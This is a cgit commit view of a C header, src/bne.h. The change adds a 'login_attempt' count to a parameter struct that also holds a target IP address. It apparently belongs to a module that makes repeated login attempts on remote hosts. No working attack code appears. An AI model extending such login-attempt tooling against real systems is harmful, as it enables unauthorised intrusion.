aboutsummaryrefslogtreecommitdiff
path: root/src/bne.h
diff options
context:
space:
mode:
authorDavid Timber <mieabby@gmail.com>2020-09-24 15:05:07 +0930
committerDavid Timber <mieabby@gmail.com>2020-09-24 15:05:07 +0930
commit9f948554902e67cd796dd0635a3c632ccd40c206 (patch)
tree419e5c0391e0848de744aa2cbb4fc88b7071f677 /src/bne.h
parent5529cb366b7e7e6bb2dedefa1d6495bdb4d0352f (diff)
* bne: add "login_attempt" param to impl "oneshot"
Diffstat (limited to 'src/bne.h')
-rw-r--r--src/bne.h1
1 files changed, 1 insertions, 0 deletions
diff --git a/src/bne.h b/src/bne.h
index 24e0f51..f682008 100644
--- a/src/bne.h
+++ b/src/bne.h
@@ -49,6 +49,7 @@ struct prne_bne_param {
prne_arch_t self;
} rcb;
prne_ip_addr_t subject;
+ unsigned int login_attempt;
};
struct prne_bne_result {